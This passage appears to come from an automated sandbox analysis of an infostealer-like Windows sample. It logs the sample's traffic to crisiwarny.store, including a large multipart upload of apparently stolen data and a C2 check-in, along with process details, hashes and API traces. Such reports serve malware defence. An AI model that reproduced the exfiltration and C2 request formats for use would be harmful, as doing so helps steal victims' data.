                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 585126
                                                                                  Host: crisiwarny.store
                                                                                  2024-10-27 07:52:21 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 33 35 33 30 34 46 44 41 32 44 41 39 32 41 33 44 37 42 45 31 38 30 32 44 41 38 46 42 32 39 44 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                  Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"935304FDA2DA92A3D7BE1802DA8FB29D--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                                  2024-10-27 07:52:21 UTC15331OUTData Raw: 3e d2 cb 57 22 4f 85 26 55 8b 4e 58 f3 78 d4 1e c9 47 27 44 ed 25 b6 19 a0 f4 e2 be da c7 44 a7 6f e6 9a fa b1 04 f7 1f 3d 7d 51 c3 b1 8d fb 30 b5 50 3e 83 bb 59 2d d3 8d d7 5a 8e e1 85 2b 15 06 99 ea 53 6f 4b 01 65 72 5c eb 76 45 4b a6 f5 c0 89 d5 9c b3 c1 d4 5a 26 16 fe c9 f1 99 39 58 3e 5c b3 17 07 17 d6 54 77 55 95 2f fe 38 0c 4e b6 1c ee 33 ed 29 b8 3a f3 ea 58 ff ff df 06 60 9f 58 e2 01 df 06 cf 62 21 6e 63 e7 2e dd 62 c4 e1 6f b0 b8 2c af fd 7b 87 65 80 3d d0 ec 70 01 a5 68 d0 48 26 f7 e8 00 af 26 2e f8 00 43 b7 4e 1f 8d f5 4e 66 16 ea f8 ed 45 6d 3f ac 5e 39 cf 05 55 5a 84 1d c8 fd 5d ba 94 e9 32 e0 fd 31 83 ca cb 02 80 7f a7 db 5c 8b cf 30 5d 6c ae 4e 8d 49 e5 c7 3c d9 28 4c 84 de f4 2b 8d f3 e6 5f 42 18 6a 76 23 5c fc 53 40 73 fb 6c a0 fe 03 03
                                                                                  Data Ascii: >W"O&UNXxG'D%Do=}Q0P>Y-Z+SoKer\vEKZ&9X>\TwU/8N3):X`Xb!nc.bo,{e=phH&&.CNNfEm?^9UZ]21\0]lNI<(L+_Bjv#\S@sl
                                                                                  2024-10-27 07:52:21 UTC15331OUTData Raw: 5a 0f e8 b7 6d a2 bb d0 db e8 8d 7a b5 11 44 d5 4c f3 36 e8 19 19 94 6e bd 46 77 a8 63 8a 31 d1 40 39 3f 9e 6d 11 af 83 c7 0a 83 3b 57 a1 ec c6 50 67 f8 d8 f8 64 31 22 f0 58 42 87 6d 9a b2 33 c4 5d 07 43 dd 77 13 85 83 94 db 5a f2 90 1a bb ac 17 6a 75 ee 5f b3 cb 5c 7f 45 56 3c 17 a7 9d 12 a4 fa 6d 40 63 3b 4b b5 3e c1 d9 99 47 b6 c8 ba d7 3e a6 29 5b ba 80 be 48 01 6c 24 c6 ab f4 b1 d5 82 b0 21 85 a2 5d 75 db 5c df a9 a3 43 e4 7e 83 53 1d 84 0a df fc af 35 31 37 a5 ad d1 5f 98 bf ef d1 d0 f3 f2 42 c5 55 3a dd 72 f8 3a cf c9 3b 0c 65 45 f0 ec 04 97 54 c1 8e be 09 cc bd 8b ea 35 ff 14 04 2b 60 65 85 5a a5 22 11 1d 16 a9 9f 8e 9e 37 ec 5e 73 b9 1a c1 07 31 ee 5c 3b 48 e5 dd ba b2 93 1a a2 51 e1 3c 6f cb 2c a0 2d 9e 63 31 a3 04 2a 70 32 81 8c 9d 65 ab e4 8a
                                                                                  Data Ascii: ZmzDL6nFwc1@9?m;WPgd1"XBm3]CwZju_\EV<m@c;K>G>)[Hl$!]u\C~S517_BU:r:;eET5+`eZ"7^s1\;HQ<o,-c1*p2e
                                                                                  2024-10-27 07:52:21 UTC15331OUTData Raw: 52 8c 44 3d 91 72 5e 88 31 1f 77 a3 f8 3d 28 d3 a3 de 34 dd 12 a2 c3 3b 38 2b 4b ba 53 56 4b f4 ab 82 4b 28 b0 3c bf 9f 96 34 75 62 f7 dc 42 bd 9c 59 42 e5 d8 2d 52 0a ad 6a 0f 18 76 0e da 7e bf ea b7 12 92 81 2f 08 8e 5d 3d ca 5e 48 9e 31 19 20 52 64 79 0c 9b ef be d1 c4 31 66 bf ec f6 aa d5 4b 09 ac 82 50 b7 83 1d 05 8a fe e0 e0 44 59 89 e5 fe 9c f1 75 a9 85 b3 e3 55 c9 fd 68 c0 99 0b b2 5b a7 ae b5 e8 db 4a a8 7c ab a3 70 f3 d7 bd 27 be b1 40 83 1a 73 6e d9 57 a1 cf ed 7e 1f 85 35 8a 81 93 96 ef 3d 4e 7d 26 ce 5b bd bc cb 6a 8b 39 6f c4 93 74 71 82 2e 17 4c dd 1d e0 92 a4 05 d6 35 a3 94 73 ac 2e b0 36 9f b1 ac 75 76 a0 00 c9 52 1a bc 59 17 f7 02 9c 75 11 75 f7 f5 1f af 52 84 60 9f a8 f5 60 65 b6 b3 1e 17 10 1d 66 b8 d6 07 35 cb 66 a1 3c e5 fa 82 a6 f4
                                                                                  Data Ascii: RD=r^1w=(4;8+KSVKK(<4ubBYB-Rjv~/]=^H1 Rdy1fKPDYuUh[J|p'@snW~5=N}&[j9otq.L5s.6uvRYuuR``ef5f<
                                                                                  2024-10-27 07:52:21 UTC15331OUTData Raw: 0f c3 01 5c 27 a4 81 88 99 44 85 4e 43 20 81 0a 29 7c 57 9f 24 82 19 94 b9 3d 65 d2 c7 5d c4 db 06 21 5f 7b 0a 40 81 00 59 90 01 38 00 3f b6 63 32 12 8d f8 94 48 30 ef 07 21 2a 95 83 ec 54 78 44 dd 80 ce b3 bc 1e 0e 03 fd 9e e0 9f 6b f1 19 e2 4a ca 02 f1 8c 96 ea aa 16 9d 14 08 96 82 0e de 66 fb a0 c1 cd 65 44 eb b6 23 65 11 7e 67 3e 80 c2 51 e4 40 01 fd 75 c5 9d 38 c4 ce f5 54 57 17 f4 28 62 16 0a 4a d4 95 57 5d 1b 75 0d b6 1b 17 04 2c 3c 9f 04 7c 10 f9 59 48 e7 6d 41 c4 80 4d 79 ec 00 c3 a5 a1 e4 a9 e9 f3 63 0e 19 90 84 91 b8 f4 59 05 f9 63 c5 f5 12 88 54 88 66 dd 90 49 84 e3 52 cf f6 06 95 aa c9 aa 62 21 81 98 4b 66 fa af 67 9d 33 55 64 43 c3 fd 27 51 16 87 c4 4e 9b 19 5b 19 ef d1 60 6d 15 4a d2 53 d4 c0 fe e1 46 d7 ad 3f 45 94 1a fd ba 07 dc 7c 7f 20
                                                                                  Data Ascii: \'DNC )|W$=e]!_{@Y8?c2H0!*TxDkJfeD#e~g>Q@u8TW(bJW]u,<|YHmAMycYcTfIRb!Kfg3UdC'QN[`mJSF?E|
                                                                                  2024-10-27 07:52:21 UTC15331OUTData Raw: f2 1b 1f 4c da cc 7a 8c 18 d1 52 35 c3 b5 32 86 4a be 48 81 92 62 67 72 6c cb dd 9e 1d 56 50 21 cb 49 ac d4 3b 7b 0d 03 2a ff 45 53 93 35 08 f5 10 d0 c2 6e 76 e2 4f 07 15 67 3f f2 73 0f 3a de 5b 30 e2 cb bf b2 be 30 b4 f0 fa 45 b3 de ca b9 c2 c0 8e 47 2e df 3f 63 32 7c 8f 52 24 73 ac d7 d5 5b 1f 19 b3 b4 38 22 36 ce 60 2c 30 8e 29 f3 01 c3 39 7f 61 80 98 22 0e a6 89 05 7c fe 9c 45 95 1b 15 0b 63 d3 75 89 a1 09 c8 a5 cf de db b3 cc 4a 8f c4 38 6d 34 35 7c d9 06 5a d5 a7 86 52 29 80 76 64 30 4f d9 84 4c be 99 fb 90 f3 45 09 ea ab 92 c0 cb 43 a0 7b ea 1c fd c0 40 b1 d3 f5 53 0c 58 39 c3 f1 f1 81 59 58 da c8 20 dd 68 81 d2 c2 e8 57 1d e5 c8 0e 42 cc 19 08 b8 7d 39 f9 06 96 f2 f5 c9 4f 6d 54 f8 59 53 bb b0 b0 ac ac 4f 26 82 34 4b f8 15 a2 a8 d8 e0 52 ab 01 04
                                                                                  Data Ascii: LzR52JHbgrlVP!I;{*ES5nvOg?s:[00EG.?c2|R$s[8"6`,0)9a"|EcuJ8m45|ZR)vd0OLEC{@SX9YX hWB}9OmTYSO&4KR
                                                                                  2024-10-27 07:52:21 UTC15331OUTData Raw: 7f cf 8c 25 c6 70 cc ac 44 f2 d1 4d 65 9b ff f5 cb 5a 89 8b 25 da f0 18 64 12 18 b2 d2 94 80 e3 8e 08 fd 1a 62 f2 c2 8b 98 ad dc 15 f3 38 6a 5c cd da 6a 9c ce fc 06 5d 00 7b f8 64 92 44 15 3e 3f ae 89 e8 cb 16 e0 9a 3e 75 06 43 20 48 43 69 75 14 b9 6c a1 d5 db 5f 95 65 60 43 ee cc 25 4c 9a 9e 31 86 9c 05 75 97 31 15 c1 65 b2 f8 ab 05 63 63 bc 63 aa 16 4a 64 79 4a cf 1d 5c 85 00 62 16 62 09 80 eb 31 7c f4 b3 3c c8 8b a2 61 19 16 c1 71 67 08 a8 30 45 5e af 63 d5 27 e7 4d e1 ff 31 a9 99 10 75 68 e6 f0 4f 99 51 85 c9 82 45 fe 7c dc 9f 10 a3 fb 45 3d 5d 46 d4 ff 35 af 7a ef ba 5d 4e c0 5d 74 c4 6f dc b6 c9 ff 1a 75 e2 49 21 2a 22 5e f9 e1 ba de 34 4d 0a 22 1f 82 ab 1d 81 91 82 20 65 77 0c b2 e3 ff f1 85 ae f3 12 9a bf 7b 5a 74 c9 0d 3e bc 46 a5 86 3d 13 af 89
                                                                                  Data Ascii: %pDMeZ%db8j\j]{dD>?>uC HCiul_e`C%L1u1ecccJdyJ\bb1|<aqg0E^c'M1uhOQE|E=]F5z]N]touI!*"^4M" ew{Zt>F=
                                                                                  2024-10-27 07:52:21 UTC15331OUTData Raw: 52 86 49 d1 a1 cd c7 f3 4f 5e 7a 7c 7f f4 d2 a3 ce 61 ce 9e f4 f5 9f bb c7 fa 69 4f 2a 7e d9 5c 66 9e 11 0f 22 ae 3b 0b 44 ff d5 ee 91 1e 65 41 f1 cf aa f2 37 fa 74 f7 fe ad 91 1e ca b5 cb c0 10 d4 14 bc f8 cf db ec ab a3 06 9f b1 b8 c8 bc 24 48 61 2a 58 6e ed 68 7e 77 18 27 2e 61 be 77 45 9d b2 ab df 58 49 25 8e 1f 61 ed f0 a5 2d 30 f0 3b 79 0b 7e ea 4c f8 4e 3d 98 7a 28 85 c6 1a 75 51 5f e9 99 78 95 0e 9a 3e 76 dc df 3d 37 32 31 99 57 b3 42 99 4d 65 d7 a6 47 b2 4a 46 03 98 8a e9 9e 43 6c e9 b8 dd 70 44 7e 69 df 23 7f c6 a0 c3 bc 3d 15 be 2c e5 de 99 ec a9 5b b9 20 6b eb b4 17 ff 85 52 6d e5 63 4d 1b 9a 19 fe 00 8b db e6 dc da ba 5c fe 40 57 b2 6c 6e 74 73 b7 e9 50 e5 0b 3b 3d d1 2a d1 d9 6f 1b a3 55 0b c9 cc ae aa 36 2f 56 23 9b e7 e8 78 d0 ee 64 aa c8
                                                                                  Data Ascii: RIO^z|aiO*~\f";DeA7t$Ha*Xnh~w'.awEXI%a-0;y~LN=z(uQ_x>v=721WBMeGJFClpD~i#=,[ kRmcM\@WlntsP;=*oU6/V#xd
                                                                                  2024-10-27 07:52:21 UTC15331OUTData Raw: 34 ab ef 0b 15 df c5 7b 3f 4d 17 b9 65 6d 9a 61 9f 85 e2 8b 85 cd 47 aa 22 83 2e 7d ab fe 76 d5 8f f5 fe 4f 97 36 4a 58 68 92 65 70 28 72 2d 47 1b 2d a9 01 64 f1 97 c8 31 9b 17 64 c8 23 0c 89 a5 5f 37 72 e7 33 c3 4b 6f 5c 3e 49 5e 89 12 0f f7 ca 4d 37 09 13 87 c6 58 06 71 b8 68 4a fe 21 b8 68 c2 58 a1 2a 32 38 15 72 ed 7a 96 3f 18 3a f0 03 52 53 68 af bb 57 c0 a6 9f 51 8f 09 24 d6 d0 9a a1 6c 86 b9 34 1c 81 e2 15 26 d6 ce 34 3c 0e e5 9e fc e4 dd 87 4a 8d 80 dd d9 1d d6 6a 99 d5 8a ec 7c 0b 8b 95 48 1b 98 0b 7c 5f 6b 38 80 88 70 b4 0d 78 be 97 e6 b1 79 96 c4 f5 5d 3a f9 a8 c1 71 0d 7a 96 38 1c 19 a4 fd 43 4d 74 6d c7 fe f6 ca 49 b1 76 a3 7b 97 b3 98 f6 fc 1f 1d 31 a1 a9 38 4a a1 ed 48 48 2e e6 c5 40 85 81 07 cf d3 0b 97 b9 27 03 dd 6b 70 f6 11 07 d9 29 29
                                                                                  Data Ascii: 4{?MemaG".}vO6JXhep(r-G-d1d#_7r3Ko\>I^M7XqhJ!hX*28rz?:RShWQ$l4&4<Jj|H|_k8pxy]:qz8CMtmIv{18JHH.@'kp))
                                                                                  2024-10-27 07:52:21 UTC15331OUTData Raw: fc dc eb 20 e1 97 72 51 93 ec 27 12 f3 2b 38 f3 f9 f4 3f 67 43 83 2b aa 43 fb 35 86 ac 73 f4 7e f0 60 37 7d 3b d0 65 5f de 9b bf 12 7b 1f 6e e8 50 27 47 c1 b8 38 1d 39 82 9f dd bb 7e 2c 11 17 d3 25 f4 fb 13 db 7a c2 c9 85 fd 32 d0 f1 2a 5c b3 73 97 13 1c 0e 47 cb 88 09 6c 04 37 b0 54 a5 b2 82 fe fc 4b 77 c0 d2 16 1a 52 b9 12 c2 d0 f3 b7 e9 08 ff bd fb 66 cd 45 89 3e 0f 31 87 ec 1d 4a 72 15 8a f7 d4 9e 0f 68 68 63 7b 83 a1 f8 9b fd 27 a4 97 a9 db 32 f8 e3 75 ab 1d 0c 86 db e8 04 d3 9c b3 02 f6 32 91 53 61 0a 77 c5 d4 21 59 fb e0 ce 21 2b ad 79 36 fd 10 37 fe 32 fb 3d bf 18 cf 27 72 80 c1 4f ee 09 51 a4 16 cd db e0 c5 66 a5 97 cd e0 10 d8 ff 61 8b da 95 ab 6b df 0e c3 7b 15 88 5d da b2 89 aa 86 39 e8 ce d7 7d 09 5e 0e 26 30 37 d7 fb 3c 14 c0 65 77 f9 10 4e
                                                                                  Data Ascii: rQ'+8?gC+C5s~`7};e_{nP'G89~,%z2*\sGl7TKwRfE>1Jrhhc{'2u2Saw!Y!+y672='rOQfak{]9}^&07<ewN
                                                                                  2024-10-27 07:52:24 UTC1019INHTTP/1.1 200 OK
                                                                                  Date: Sun, 27 Oct 2024 07:52:24 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=psflq9t3n06cekbl8fn9uk6d25; expires=Thu, 20 Feb 2025 01:39:03 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  cf-cache-status: DYNAMIC
                                                                                  vary: accept-encoding
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cDjpe%2FK78ADBZotfPThqMFAw5WwKr6QvdCkZpy3Nn%2BiWJtX0QW75AGUoNP6TySYOS94%2B%2B3YpsHlVbg4mxJEBCStQcIJD2f1YihAwCI%2B2QP1xm0UeSYB13UcSw3ShkaGQRI4r"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8d911b2fdae34618-DFW
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1733&sent=236&recv=639&lost=0&retrans=0&sent_bytes=2837&recv_bytes=587717&delivery_rate=1685681&cwnd=251&unsent_bytes=0&cid=6a7cfb0ac157d9e3&ts=2806&x=0"


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  7192.168.2.749763104.21.95.914437160C:\Users\user\Desktop\file.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-27 07:52:25 UTC264OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 87
                                                                                  Host: crisiwarny.store
                                                                                  2024-10-27 07:52:25 UTC87OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d 26 68 77 69 64 3d 39 33 35 33 30 34 46 44 41 32 44 41 39 32 41 33 44 37 42 45 31 38 30 32 44 41 38 46 42 32 39 44
                                                                                  Data Ascii: act=get_message&ver=4.0&lid=4SD0y4--legendaryy&j=&hwid=935304FDA2DA92A3D7BE1802DA8FB29D
                                                                                  2024-10-27 07:52:25 UTC1007INHTTP/1.1 200 OK
                                                                                  Date: Sun, 27 Oct 2024 07:52:25 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=713h0p4is7pmu7kl5i8adh5lai; expires=Thu, 20 Feb 2025 01:39:04 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  cf-cache-status: DYNAMIC
                                                                                  vary: accept-encoding
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QrCiJ%2B6VHI3pSVtajfwhQekYfFGGHvwgNO9zUlfUgxOPYC2B3QMaGwTycAkQi3%2FEpBOgxunzvGwPamfLuRkxVo5w3rkQOZRTvok22DHa1G49HW1W%2B15QXVmBzAkb8bkdIvfD"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8d911b451a606b27-DFW
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1224&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=987&delivery_rate=2327974&cwnd=249&unsent_bytes=0&cid=5cd8daa1bc0e1fcc&ts=522&x=0"
                                                                                  2024-10-27 07:52:25 UTC130INData Raw: 37 63 0d 0a 34 2f 68 62 52 61 4d 4a 63 34 73 4c 32 64 61 78 46 58 72 41 65 30 68 4d 45 39 4b 41 63 4c 4b 78 67 37 44 33 74 52 36 66 67 64 65 34 67 33 6b 77 67 54 4e 52 34 33 2b 74 70 6f 74 4a 56 5a 78 55 65 58 51 6d 2f 4c 4a 42 68 35 2b 79 67 63 53 62 4c 36 6e 64 2b 49 79 65 50 52 6d 4d 62 52 62 74 4a 62 79 75 31 44 64 57 34 68 30 38 62 69 6e 69 72 46 4c 58 6b 37 6d 41 69 75 67 3d 0d 0a
                                                                                  Data Ascii: 7c4/hbRaMJc4sL2daxFXrAe0hME9KAcLKxg7D3tR6fgde4g3kwgTNR43+tpotJVZxUeXQm/LJBh5+ygcSbL6nd+IyePRmMbRbtJbyu1DdW4h08binirFLXk7mAiug=
                                                                                  2024-10-27 07:52:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Statistics

                                                                                  CPU Usage

                                                                                  Click to jump to process

                                                                                  Memory Usage

                                                                                  Click to jump to process

                                                                                  High Level Behavior Distribution

                                                                                  Click to dive into process behavior distribution

                                                                                  Behavior

                                                                                  Click to jump to process

                                                                                  System Behavior

                                                                                  General

                                                                                  Target ID:6
                                                                                  Start time:03:52:08
                                                                                  Start date:27/10/2024
                                                                                  Path:C:\Users\user\Desktop\file.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                  Imagebase:0x740000
                                                                                  File size:2'985'472 bytes
                                                                                  MD5 hash:4F0EC9B4A92F1FD134607802EAE25E8D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:10
                                                                                  Start time:05:39:26
                                                                                  Start date:27/10/2024
                                                                                  Path:C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user~1\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exe"
                                                                                  Imagebase:0x1000000
                                                                                  File size:2'798'080 bytes
                                                                                  MD5 hash:241D9C9E1DF8F28851CBC0421AA56E70
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Disassembly

                                                                                  Reset < >

                                                                                    Non-executed Functions

                                                                                    Function 05D09FC5 Relevance: 2.8, Strings: 1, Instructions: 1528COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000003.1397297123.0000000005D09000.00000004.00000800.00020000.00000000.sdmp, Offset: 05D09000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_3_5d09000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: D
                                                                                    • API String ID: 0-2746444292
                                                                                    • Opcode ID: db135f7875ef7ab29e41a42d2d3f04e11d1bdbd7bde4db43dc41460abc655b2f
                                                                                    • Instruction ID: 770336ae88d5180fcb6c9e8443bd74fc838317cb602995e8799e16663fca4a20
                                                                                    • Opcode Fuzzy Hash: db135f7875ef7ab29e41a42d2d3f04e11d1bdbd7bde4db43dc41460abc655b2f
                                                                                    • Instruction Fuzzy Hash: 8C42A5A244E7C19FD7138B748D69A913FB1AF13208B1E46EBC4C5CF0B3E259490AD766
                                                                                    Function 01318AC9 Relevance: .8, Instructions: 751COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000003.1373874345.0000000001313000.00000004.00000020.00020000.00000000.sdmp, Offset: 01313000, based on PE: false
                                                                                    • Associated: 00000006.00000003.1506923908.0000000001314000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_3_1313000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: eb0a730adbb4b97ac9e25afa3904b39d32a8de2dfb456fb109ff21d3bd62f940
                                                                                    • Instruction ID: 4c538e9a09eb7ff1f46eaf58701790a387784c37fae6f24074f52b6a769ca048
                                                                                    • Opcode Fuzzy Hash: eb0a730adbb4b97ac9e25afa3904b39d32a8de2dfb456fb109ff21d3bd62f940
                                                                                    • Instruction Fuzzy Hash: 2DF1F6A244F7C15FE3478B74887A6867FB2AF23518B5E05DFC4C0CE1A3E25A484AD716
                                                                                    Function 013070B0 Relevance: .7, Instructions: 702COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000003.1373895080.0000000001307000.00000004.00000020.00020000.00000000.sdmp, Offset: 01307000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_3_1307000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 296cd4efc8e8a2d29761eae2b07fca0b49683e63321d78f9cec3d3f319e7aea5
                                                                                    • Instruction ID: 891adc700be240081646e426f0806ac847ce5d7454edae9783136598c4ef2d17
                                                                                    • Opcode Fuzzy Hash: 296cd4efc8e8a2d29761eae2b07fca0b49683e63321d78f9cec3d3f319e7aea5
                                                                                    • Instruction Fuzzy Hash: A471116154E3D18FD3138BB888796857FB09E13669B1E01CBC4C48F0E3E619681EE7A7

                                                                                    Execution Graph

                                                                                    Execution Coverage:3%
                                                                                    Dynamic/Decrypted Code Coverage:27.3%
                                                                                    Signature Coverage:9.1%
                                                                                    Total number of Nodes:33
                                                                                    Total number of Limit Nodes:1
                                                                                    execution_graph 6304 118c028 6305 118c055 CreateFileA 6304->6305 6306 118c069 6305->6306 6311 100e574 6312 100f142 VirtualAlloc 6311->6312 6313 100f156 6312->6313 6314 59d0d48 6315 59d0d93 OpenSCManagerW 6314->6315 6317 59d0ddc 6315->6317 6318 59d1308 6319 59d1349 ImpersonateLoggedOnUser 6318->6319 6320 59d1376 6319->6320 6321 1189f02 LoadLibraryA 6322 1189f15 6321->6322 6323 118c202 6324 118c205 6323->6324 6327 118c23c 6323->6327 6328 118c216 6324->6328 6326 118c20e CreateFileA 6326->6327 6329 118c21c CreateFileA 6328->6329 6330 118c23c 6329->6330 6330->6326 6293 1196195 6294 119b659 6293->6294 6295 119b68b RegOpenKeyA 6294->6295 6296 119b6b2 RegOpenKeyA 6294->6296 6295->6296 6297 119b6a8 6295->6297 6298 119b6cf 6296->6298 6297->6296 6299 119b713 GetNativeSystemInfo 6298->6299 6300 1195e9f 6298->6300 6299->6300 6301 59d1510 6302 59d1558 ControlService 6301->6302 6303 59d158f 6302->6303 6331 1197064 LoadLibraryA

                                                                                    Executed Functions

                                                                                    Function 0118C216 Relevance: 1.6, APIs: 1, Instructions: 134fileCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 69 118c216-118c23e CreateFileA 72 118c453-118c46f 69->72 73 118c244-118c2de call 118c29f 69->73 80 118c2f2-118c336 call 118c339 73->80 81 118c2e4-118c2f1 73->81 81->80
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.1653522526.0000000001186000.00000040.00000001.01000000.00000006.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.1653260775.0000000001000000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653281142.0000000001002000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653304149.0000000001006000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653321615.000000000100A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653341729.0000000001014000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653360423.0000000001015000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653378596.0000000001016000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653484088.0000000001174000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653502149.0000000001176000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653522526.0000000001193000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653564056.00000000011AD000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653580823.00000000011AE000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653597564.00000000011B1000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653614562.00000000011B3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653633462.00000000011BF000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653649910.00000000011C0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653667239.00000000011C6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653687899.00000000011D7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653706465.00000000011E1000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653723587.00000000011E6000.00000040.00000001.01000000.00000006.sdmpDownload File
